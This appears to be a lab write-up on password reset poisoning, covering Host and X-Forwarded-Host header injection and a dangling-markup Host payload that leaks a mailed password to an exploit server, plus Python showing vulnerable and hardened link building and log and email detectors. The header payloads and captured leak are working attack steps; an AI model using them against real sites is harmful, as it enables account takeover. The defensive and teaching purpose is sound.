# Password reset poisoning

Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into generating a password reset link pointing to a domain under their control.

## Changing the Host header to point to a malicious domain

Issue a password reset request for your own user, intercept the request, and replace the `Host` header so that it points to your domain.

## Password reset poisoning via middleware

To perform this attack, instead of just replacing the `Host` header, add:

```http
X-Forwarded-Host: exploit-0a4200f20354f7f78397d1b401e20049.exploit-server.net
```

This poisons the reset link so that it points to your server; when the user clicks it, the reset token shows up in your server's logs and can be used to change the password.
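The following added example (not from the original page) shows, in Python, the server-side pattern behind the two sections above and its fix: a link built from `X-Forwarded-Host` or `Host` can be redirected by whoever controls those headers, while a link built from a configured canonical origin cannot. It also includes a small detector that scans constructed reverse-proxy log lines for password-reset requests whose `Host` or `X-Forwarded-Host` is outside the allowlist. The hostnames, the token and the log format are assumed values.

```python
import re
from urllib.parse import urlunsplit

# Constructed configuration for this example (not from the original page).
CANONICAL_SCHEME = "https"
CANONICAL_HOST = "app.example.com"
ALLOWED_HOSTS = {"app.example.com", "www.app.example.com"}
RESET_TOKEN = "constructed-token-0123456789abcdef"


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Builds the link from whatever the request claims.

    This is the weakness the page describes: X-Forwarded-Host (as set by a
    client or an untrusted middleware hop) and then Host are trusted verbatim,
    so either header can redirect the reset link to another domain.
    """
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"{CANONICAL_SCHEME}://{host}/reset-password?token={token}"


def hardened_reset_link(headers: dict, token: str) -> str:
    """Builds the link from server-side configuration only.

    The request's Host header is still checked against an allowlist so that a
    mismatch can be rejected and logged, but the emitted link always uses the
    configured canonical host, and X-Forwarded-Host is never consulted.
    """
    host = headers.get("Host", "")
    if host.split(":")[0].lower() not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return urlunsplit((CANONICAL_SCHEME, CANONICAL_HOST,
                       "/reset-password", f"token={token}", ""))


# Constructed reverse-proxy access-log lines. Assumption: the proxy's log
# format records the Host and X-Forwarded-Host request headers as host="..."
# and xfh="..." fields ("-" when the header is absent).
SAMPLE_LOG = """\
10.0.3.10 - [28/Mar/2025:03:40:01 +0000] "POST /forgot-password HTTP/1.1" 200 host="app.example.com" xfh="-"
10.0.3.11 - [28/Mar/2025:03:41:12 +0000] "POST /forgot-password HTTP/1.1" 200 host="app.example.com" xfh="attacker.example.net"
10.0.3.12 - [28/Mar/2025:03:42:46 +0000] "POST /forgot-password HTTP/1.1" 200 host="attacker.example.net" xfh="-"
10.0.3.13 - [28/Mar/2025:03:43:00 +0000] "GET /login HTTP/1.1" 200 host="attacker.example.net" xfh="-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) host="(?P<host>[^"]*)" xfh="(?P<xfh>[^"]*)"$'
)


def find_poisoning_attempts(log_text: str) -> list:
    """Returns (ip, path, header, value) for every password-reset request whose
    Host or X-Forwarded-Host names a host outside the allowlist.

    Only the reset endpoint is inspected: an unexpected Host on other paths is
    noise for this purpose, while a mismatch on /forgot-password is precisely
    the signature of a poisoning attempt.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/forgot-password"):
            continue
        for header in ("host", "xfh"):
            value = m[header]
            if value != "-" and value.split(":")[0].lower() not in ALLOWED_HOSTS:
                hits.append((m["ip"], m["path"], header, value))
    return hits


if __name__ == "__main__":
    poisoned = {"Host": "app.example.com", "X-Forwarded-Host": "attacker.example.net"}
    print("vulnerable:", vulnerable_reset_link(poisoned, RESET_TOKEN))
    print("hardened:  ", hardened_reset_link(poisoned, RESET_TOKEN))
    for hit in find_poisoning_attempts(SAMPLE_LOG):
        print("suspicious reset request:", hit)
```

The allowlist check in `hardened_reset_link` is deliberately separate from link construction: even when the proxy is trusted to set `X-Forwarded-Host`, the reset URL should come from configuration, and a rejected `Host` is worth an alert rather than a silent fallback.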

## Password reset poisoning via dangling markup

If the application doesn’t use reset tokens and instead sends the **new password directly in the email body**, you can exploit this by injecting HTML in the `Host` header to **break the markup** and leak the full content to your **malicious server** via a `GET` request.

```
Sent:     2025-03-28 03:46:12 +0000  
From:     no-reply@<lab-id>.web-security-academy.net  
To:       wiener@exploit-<exploit-id>.exploit-server.net  
Subject:  Account recovery
<p>Hello!</p>
<p>Please <a href='https://<lab-id>.web-security-academy.net/login'>click here</a> to login with your new password: uW9zyg2qaG</p>
<p>Thanks,<br/>Support team</p>
<i>This email has been scanned by the MacCarthy Email Security service</i>
```

**Exploit Payload**

You send a request to `/forgot-password` with a **malicious `Host` header**:

```
Host: <lab-id>.web-security-academy.net:'<a href="//<your-exploit-server>.exploit-server.net/?
```

This **breaks the original link** and turns the **rest of the email body** into part of the `<a href>` attribute. The browser (or mail client) will automatically follow the link and **send a GET request** to your server, carrying the remainder of the body, including the new password, in the request path.

Raw:

```
Sent:     2025-03-28 03:42:11 +0000
From:     no-reply@0ac3008a0318e2e88088260e000500ac.web-security-academy.net
To:       wiener@exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net
Subject:  Account recovery

<p>Hello!</p><p>Please <a href='https://0ac3008a0318e2e88088260e000500ac.web-security-academy.net:'<a href="//exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net/?/login'>click here</a> to login with your new password: UalLCIt2ub</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>
```

Your server will catch the request:

```http
10.0.3.226  2025-03-28 03:42:46 +0000  
"GET /?/login'>click+here</a>+to+login+with+your+new+password:+5B9ufwHEy7</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1"
```
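As an added example (not the page's code), the following Python shows the server-side rendering behind the dangling-markup case beside a hardened version: the vulnerable renderer interpolates the `Host` header and a cleartext password straight into the HTML body, while the hardened one rejects any `Host` that is not a plain `hostname[:port]` equal to the configured canonical host, HTML-escapes the URL it emits, and sends a reset link instead of a password. `audit_email_links` is the kind of outbound-mail check that catches a broken anchor before the message leaves. The canonical host, the poisoned `Host` value (modelled on the shape of the page's payload) and the token are constructed values.

```python
import html
import re

# Constructed values for this example (not from the original page).
CANONICAL_HOST = "app.example.com"
# Same shape as the page's payload: a quote and a second <a> inside the Host value.
POISONED_HOST = "app.example.com:'<a href=\"//attacker.example.net/?"

# Strict hostname grammar (RFC 1123 labels, optional numeric port). Quotes,
# angle brackets and slashes can never pass this, so they never reach a template.
HOSTNAME_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?$",
    re.IGNORECASE,
)


def render_vulnerable(host: str, new_password: str) -> str:
    """Interpolates the request's Host header and a cleartext password into the
    HTML body, which is the pattern the page's sample email shows."""
    return (
        "<p>Hello!</p>"
        f"<p>Please <a href='https://{host}/login'>click here</a> "
        f"to login with your new password: {new_password}</p>"
        "<p>Thanks,<br/>Support team</p>"
    )


def render_hardened(requested_host: str, reset_token: str) -> str:
    """Refuses any Host that is not a plain hostname[:port] matching the
    canonical host, escapes the one URL it emits, and sends a single-use reset
    link rather than the password itself."""
    if (not HOSTNAME_RE.match(requested_host)
            or requested_host.split(":")[0].lower() != CANONICAL_HOST):
        raise ValueError(f"refusing to build recovery mail for host {requested_host!r}")
    url = f"https://{CANONICAL_HOST}/reset-password?token={reset_token}"
    safe_url = html.escape(url, quote=True)  # defence in depth: no quote can close the attribute
    return (
        "<p>Hello!</p>"
        f'<p>Please <a href="{safe_url}">click here</a> to choose a new password.</p>'
        "<p>Thanks,<br/>Support team</p>"
    )


def audit_email_links(body: str) -> list:
    """Returns a list of findings for a rendered email; an empty list means it
    passed. Two signals: unbalanced <a>/</a> tags (the markup was broken) and
    any quoted href whose host is not the canonical one (the link was poisoned)."""
    findings = []
    opens, closes = body.count("<a "), body.count("</a>")
    if opens != closes:
        findings.append(f"unbalanced anchors: {opens} <a> vs {closes} </a>")
    for _quote, href in re.findall(r"href=(['\"])(.*?)\1", body):
        m = re.match(r"^(?:[a-z]+:)?//([^/?#]+)", href, re.IGNORECASE)
        host = m.group(1) if m else ""
        if host.lower() != CANONICAL_HOST:
            findings.append(f"link host {host!r} is not {CANONICAL_HOST!r}")
    return findings


if __name__ == "__main__":
    broken = render_vulnerable(POISONED_HOST, "constructed-pw")
    print("vulnerable body findings:", audit_email_links(broken))
    print("hardened body findings:  ", audit_email_links(render_hardened(CANONICAL_HOST, "constructed-token")))
    try:
        render_hardened(POISONED_HOST, "constructed-token")
    except ValueError as exc:
        print("hardened renderer rejected poisoned Host:", exc)
```

Note that `audit_email_links` on the vulnerable body reports both an unbalanced anchor count and a first link host of `app.example.com:` (the trailing colon is the start of the injected value), which is enough to quarantine the message; the real fix is still to stop deriving anything in the email from the request's `Host` and to stop mailing passwords.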
